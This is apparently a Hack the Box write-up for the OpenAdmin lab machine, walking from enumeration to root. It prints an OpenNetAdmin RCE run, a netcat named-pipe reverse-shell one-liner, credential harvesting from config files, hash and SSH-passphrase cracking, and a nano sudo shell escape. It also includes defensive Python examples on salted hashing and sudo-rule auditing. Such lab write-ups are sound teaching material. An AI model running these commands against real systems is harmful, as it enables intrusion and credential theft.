Hack the Box - OpenAdmin

OpenAdmin was one of my favorite boxes. It's actually not very difficult, but it has just enough to force you to look around a bit. I enjoyed it because I felt like nothing was really guesswork. Everything I needed was presented to me on the box and in some way that seemed at least somewhat realistic. At the very least, there were just enough breadcrumbs to point you in a direction where you didn't feel it relied partly on guesswork, and that's always a plus for me.

Nmap Scans

First, we start with Nmap, as always:

sudo nmap -T4 -p 22,80 -sSV -sC -oN scriptScan
[sudo] password for nux: 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-11 20:23 CDT 
Nmap scan report for
Host is up (0.24s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.67 seconds

Looks like we only have SSH and HTTP. SSH is rarely a great avenue of attack in HTB; you'll learn that as you do more boxes. It's pretty secure overall, and on HTB the way in is usually designed around the box: credential reuse (so you'd see some hint as to the password), a default password (so you might see a machine running Raspbian or another well-known service and try its known default), etc. In other words, SSH is rarely where we get our initial foothold unless the box hints otherwise by giving us some way in.

Port 80 – HTTP

We investigate HTTP. Looks like a default Apache page. We can try some common directories like robots.txt. Not much to see here:


Next we look more closely at the web server itself. Beyond the Apache default page there's nothing obvious, so, as always, we run GoBuster to enumerate web directories.

I'll run the following, which tells gobuster to do directory enumeration against the web server using the common.txt wordlist and to write the results to a file called commonList that I can look at later if I need to.

gobuster dir -u -w /usr/share/wordlists/dirb/common.txt -o commonList

Let's take a look at the output:

Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:  
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2020/07/11 20:30:35 Starting gobuster
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/artwork (Status: 301)
/index.html (Status: 200)
/music (Status: 301)
/server-status (Status: 403)
2020/07/11 20:32:00 Finished

While this tool is running, I like to poke around and see if I can find anything. Not a lot turns up on this box.

Investigating the different directories

Now that our directory scan has finished, we can investigate the results. Click around and see if there are any useful links. There's no real secret here other than manually browsing, looking at the source, etc. Try to see if there's anything that looks interesting.

Eventually we come to music. It looks like some page for something called SOL music.

Interestingly, if we look at the top of the browser window, we will see a bit of a giveaway:

Not live. Not for production use. Interesting. It's still in development, and this is probably our hint to keep looking. Eventually, if we click around enough, we hit the "login" link and are taken to: "" I would imagine there's a wordlist out there that would find this, but it's nice to see that it's reachable with persistent searching through the web pages.

Interesting things to note here: "Newer version available" and "Your version = v18.1.1."

That gives us two vital pieces of information:

  • The current version of this console (18.1.1).
  • It tells us that this one is out of date.

The directory is called ona, so let's search for ona 18.1.1 and see what we find. Well, that's convenient: the first result on Google is an Exploit-DB entry for RCE in OpenNetAdmin 18.1.1. What a coincidence! Our box is called OpenAdmin. Ya think maybe we can? We'll see.


Let's run the script and .... fail:

$ ./exploit.sh
./exploit.sh: line 8: $'\r': command not found
./exploit.sh: line 16: $'\r': command not found
./exploit.sh: line 18: $'\r': command not found
./exploit.sh: line 23: syntax error near unexpected token `done'
./exploit.sh: line 23: `done'

So much for that win. What the heck does that even mean?

I searched for one of the errors: "$'\r': command not found"

What does this mean? After some searching, we find this link: https://stackoverflow.com/questions/11616835/r-command-not-found-bashrc-bash-profile

Turns out it's a line-ending issue: the script has Windows-style CRLF line endings, so bash sees a stray carriage return (\r) at the end of each line and tries to run it as a command. It was probably created or saved on a Windows machine. The fix is to run dos2unix on it:

$ dos2unix exploit.sh 
dos2unix: converting file exploit.sh to Unix format...

That wasn't so bad. Let's try again:

~/Documents/htb/boxes/openadmin/sploits$ ./exploit.sh
$ whoami

Sweet. We have a shell.

Now we have to upgrade our shell to make it somewhat usable. That's easy enough:

First, let's run `which python`. We get nothing. How about `which python3`? Good news. Python 3 is installed: /usr/bin/python3.

Attempting to upgrade the shell doesn't seem to work. It just seems to fail. Maybe first we can set up our reverse shell and then upgrade it from there.

Set up our listener and run: `mknod /tmp/backpipe p;/bin/sh 0</tmp/backpipe | nc 443 1>/tmp/backpipe`

Okay. We have our shell now.

Terminal 1 where we had our original shell:

$ ./exploit.sh
$ whoami
$ mknod /tmp/backpipe p;/bin/sh 0</tmp/backpipe | nc 443 1>/tmp/backpipe

Terminal 2, where we had our listener:

~$ nlis443
listening on [any] 443 ...
connect to [] from (UNKNOWN) [] 59698

Time to upgrade that shell, boi!!!

Remember, this box has Python 3, so run: `/usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'`

  • Hit ctrl+z to put your current netcat session in the background.
  • Type `stty raw -echo`.
  • Type `fg` and press enter to bring your process back into the foreground.
  • Type `export TERM=xterm`.

Now that's a shell.

Enumeration Time!

Let's look around and see what we find on this sucker.

As we continue to work our way through, we find the following:

www-data@openadmin:/var/www/html$ l
total 36K
-rw-r--r-- 1 www-data www-data  11K Nov 21  2019 index.html
lrwxrwxrwx 1 www-data www-data   12 Nov 21  2019 ona -> /opt/ona/www
drwxrwxr-x 8 www-data www-data 4.0K Nov 22  2019 marga
drwxrwxr-x 7 www-data www-data 4.0K Nov 22  2019 artwork
drwxrwxr-x 8 www-data www-data 4.0K Nov 22  2019 sierra
drwxr-xr-x 6 www-data www-data 4.0K Nov 22  2019 .
drwxrwxr-x 8 www-data www-data 4.0K Nov 22  2019 music
drwxr-xr-x 4 root     root     4.0K Nov 22  2019 ..

Again, this is just a lot of searching and hoping to find something. I notice that ona is a symlink to /opt/ona/www.

Through searching we find the following directory:

www-data@openadmin:/var/www/html/ona/local/config$ ls
database_settings.inc.php  motd.txt.example  run_installer

With a bit of grep magic, we find a password:

www-data@openadmin:/var/www/html/ona/local/config$ cat * | egrep pass
        'db_passwd' => 'n1nj4W4rri0R!',

Let's hold on to that: n1nj4W4rri0R!

What else can we find?

www-data@openadmin:/var/www/html/ona/local/config$ cd /var/www/
www-data@openadmin:/var/www$ l
total 16K
drwxr-xr-x 14 root     root     4.0K Nov 21  2019 ..
lrwxrwxrwx  1 www-data www-data   12 Nov 21  2019 ona -> /opt/ona/www
drwxr-xr-x  6 www-data www-data 4.0K Nov 22  2019 html
drwxr-xr-x  4 root     root     4.0K Nov 22  2019 .
drwxrwx---  2 jimmy    internal 4.0K Nov 23  2019 internal

There's a directory, internal, owned by jimmy and the internal group, with no permissions for anyone else. I don't have access as www-data. Maybe I can check that later.

Finding users

We can look up users by looking at the /home directory:

www-data@openadmin:/var/www/html/ona/local/config$ ls /home
jimmy  joanna

We can also check out /etc/passwd:

www-data@openadmin:/var/www/html/ona/local/config$ cat /etc/passwd
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false

We know jimmy and joanna are definitely two users. (Sidenote: I'm doing this with knowledge obtained by having solved the box in the past. I intend to create a post where I go over some enumeration steps in more detail, so it can make more sense how I came to this. It wasn't magic. It was hours of frustration and searching through files.)

Attempting to use that password

Let's see if we can ssh into the box with one of those users and that password we got. Sweet! The password works for jimmy:

~$ ssh jimmy@
jimmy@'s password: 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Jul 12 03:34:32 UTC 2020

  System load:  0.05              Processes:             121
  Usage of /:   49.3% of 7.81GB   Users logged in:       0
  Memory usage: 18%               IP address for ens160:
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:

41 packages can be updated.
12 updates are security updates.

Last login: Thu Jan  2 20:50:03 2020 from

Finding running services

We can see some services listening on localhost only. The one on port 52846 seems a bit unusual. We will soon investigate that:

www-data@openadmin:/var/www/html/ona/local/config$ netstat -natp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 *               LISTEN      -                   
tcp        0      0    *               LISTEN      -                   
tcp        0      0*               LISTEN      -                   
tcp        0      0*               LISTEN      -                   
tcp        0      2         ESTABLISHED 2380/nc             
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
tcp6       0      0       ESTABLISHED -                   
tcp6       1      0       CLOSE_WAIT  -                   
tcp6       0      0       ESTABLISHED -   

Let's see what this service is.

If we type the SSH escape sequence ~C (at the start of a line: tilde, then shift+c) in our jimmy session, we get an ssh> prompt where we can set up local SSH port forwarding. This gives us a way to reach the service on that port, which only localhost can access:

ssh> -L 31337:
Forwarding port.

Now we can open our browser and navigate to

This forwards traffic from port 31337 on my machine, through the SSH session, to port 52846 on the loopback interface of the box I'm SSH'd into. Going to take a sec to drop a link for my friend's book here: CPH, which goes over SSH tunnelz and more.

It's a hidden login page:

Looks like our jimmy creds don't work. We have to find something else.

Back in our SSH session, I remembered that folder owned by jimmy: /var/www/internal.

We see three PHP files. Let's take a closer look:

jimmy@openadmin:/var/www/internal$ l
index.php*  logout.php*  main.php*

Parsing through these files, we eventually see that main.php has something interesting:

jimmy@openadmin:/var/www/internal$ cat main.php 
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session

We also see an interesting file when we try to grep out a password:

jimmy@openadmin:/var/www/internal$ cat * | egrep pass
         .form-signin input[type="password"] {
            if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
              if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {
                  $msg = 'Wrong username or password.';
            <input type = "password" class = "form-control"
               name = "password" required>
<h3>Don't forget your "ninja" password</h3>

Looks like a SHA-512 hash, stored unsalted and compared directly to the hash of whatever is posted. Let's take it to CrackStation and see what we get.

CrackStation made short work of that hash: Revealed is the password.
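As an added illustration (not code from this write-up or from the box), the same weakness modelled in Python: an unsalted, fast hash like the sha512 check in main.php is deterministic, so a stored digest can be matched against a precomputed table, whereas a per-user salt and a slow KDF defeat that lookup and a constant-time compare replaces the plain ==. The candidate list and lookup table are constructed.

```python
import hashlib
import hmac
import os

# Constructed candidate list standing in for the dictionary a lookup service
# such as CrackStation is built from (real tables hold billions of entries).
CANDIDATES = ["password", "letmein", "Revealed", "bloodninjas"]

# Precomputed table: unsalted sha512(candidate) -> candidate. Building it
# once is only worthwhile because the stored hash has no per-user salt.
LOOKUP_TABLE = {hashlib.sha512(c.encode()).hexdigest(): c for c in CANDIDATES}


def weak_store(password):
    """What main.php does: hash('sha512', $password) with no salt."""
    return hashlib.sha512(password.encode()).hexdigest()


def weak_lookup(stored_digest):
    """A stored unsalted digest is recovered by a single table lookup."""
    return LOOKUP_TABLE.get(stored_digest)


def strong_store(password, salt=None, iterations=200_000):
    """Hardened form: random per-user salt plus a slow KDF (PBKDF2-HMAC-SHA512),
    stored as 'pbkdf2_sha512$<iterations>$<salt hex>$<digest hex>'."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, iterations)
    return f"pbkdf2_sha512${iterations}${salt.hex()}${dk.hex()}"


def strong_verify(password, stored):
    """Recompute with the stored salt and compare in constant time;
    compare_digest replaces the plain == comparison used in main.php."""
    _algo, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha512", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def strong_lookup(stored):
    """The same table is useless against a salted record: the salt changes
    the digest of every candidate, so nothing matches."""
    _algo, _iterations, _salt_hex, dk_hex = stored.split("$")
    return LOOKUP_TABLE.get(dk_hex)
```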

Perhaps it works on that login page we found? We try the following creds: jimmy:Revealed.

This takes us to

And we see a private key:

Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D


The bottom of the page reads: Don't forget your "ninja" password. We will keep that in mind.

We can save that key on our local machine.

Looking back at the main.php listing above, we can see what it does.

Interesting. It reads joanna's private SSH key with shell_exec and prints it to the page. For that to work, the web server must have access to joanna's files, so maybe it runs as joanna.

Let's see if we can use that private key to ssh into the box:

$ ssh joanna@ -i private
load pubkey "private": invalid format
Permissions 0644 for 'private' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "private": bad permissions
joanna@'s password:                              

Whoops. Let's chmod that mofo: `chmod 700 private`

Woo! Let's go again!

$ ssh joanna@ -i private
load pubkey "private": invalid format
Enter passphrase for key 'private':

Welp, I don't have a passphrase. Back to the drawing board. Maybe we can crack it.

First, we convert the encrypted private key into a hash format john understands with ssh2john.py, then run john against it with the rockyou wordlist:

/usr/share/john/ssh2john.py privateKey > priv.hash
~/Documents/htb/boxes/openadmin/sshkeys$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt priv.hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas      (private)
1g 0:00:00:03 DONE (2020-07-11 23:13) 0.2597g/s 3725Kp/s 3725Kc/s 3725KC/sa6_123..*7¡Vamos!
Session completed

Then we crack it and get a result of: bloodninjas

We have an ssh passphrase. That must be what "Don't forget your "ninja" password" meant.

Let's try again:

~/Documents/htb/boxes/openadmin/sshkeys$ ssh joanna@ -i private
load pubkey "private": invalid format
Enter passphrase for key 'private': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Jul 12 04:17:17 UTC 2020

  System load:  0.24              Processes:             112
  Usage of /:   49.6% of 7.81GB   Users logged in:       1
  Memory usage: 18%               IP address for ens160:
  Swap usage:   0%

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Thu Jan  2 21:12:40 2020 from

Sweet. We are in as joanna.

Getting root

It's a good habit to run sudo -l when you first log in as a user:

joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass,

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

This output tells us that joanna can run /bin/nano /opt/priv with sudo rights and no password.

Let's give it a shot.

It takes us to nano:

We can attempt a shell escape. A good resource is GTFOBins.

Looks like nano can be used to break into a root shell:

It can be used to break out from restricted environments by spawning an interactive system shell.

reset; sh 1>&0 2>&0

Let's attempt

reset; sh 1>&0 2>&0

while running Nano.

And we are root:
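As an added defender-side example (not code from this write-up), a small Python audit that parses `sudo -l` output like joanna's and flags rules whose binary is an editor or pager with a documented shell escape, and rules tagged NOPASSWD; the remediation for the nano case is sudoedit, which runs the editor as the invoking user. The second rule in the sample and the short list of escape-capable binaries are my own assumptions.

```python
import re

# Constructed sample: the `sudo -l` output for joanna shown above, plus one
# extra rule (assumed) to show that not every entry is a finding.
SUDO_L_OUTPUT = """\
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass,

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv
    (root) /usr/bin/systemctl restart apache2
"""

# Editors and pagers whose GTFOBins entries document a shell escape
# (nano's "reset; sh 1>&0 2>&0" is the one used above). Assumed, short list.
SHELL_ESCAPE_BINARIES = {"nano", "vim", "vi", "less", "more", "man"}

# Rule line shape: "(runas) [TAG: TAG: ...] command args"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")


def parse_sudo_rules(output):
    """Return (runas, tags, command) for each rule after the 'may run' line."""
    rules = []
    in_rules = False
    for line in output.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if m:
            tags = {t.rstrip(":") for t in m.group("tags").split()}
            rules.append((m.group("runas").strip(), tags, m.group("cmd").strip()))
    return rules


def audit_sudo_rules(output):
    """Return (command, issue) pairs: 'shell-escape' when the allowed binary
    can spawn an interactive shell (fix: sudoedit or a fixed-argument wrapper),
    'nopasswd' when no password is required to elevate."""
    findings = []
    for runas, tags, cmd in parse_sudo_rules(output):
        binary = cmd.split()[0].rsplit("/", 1)[-1]
        if binary in SHELL_ESCAPE_BINARIES:
            findings.append((cmd, "shell-escape"))
        if "NOPASSWD" in tags:
            findings.append((cmd, "nopasswd"))
    return findings


if __name__ == "__main__":
    for cmd, issue in audit_sudo_rules(SUDO_L_OUTPUT):
        print(f"{issue:13} {cmd}")
```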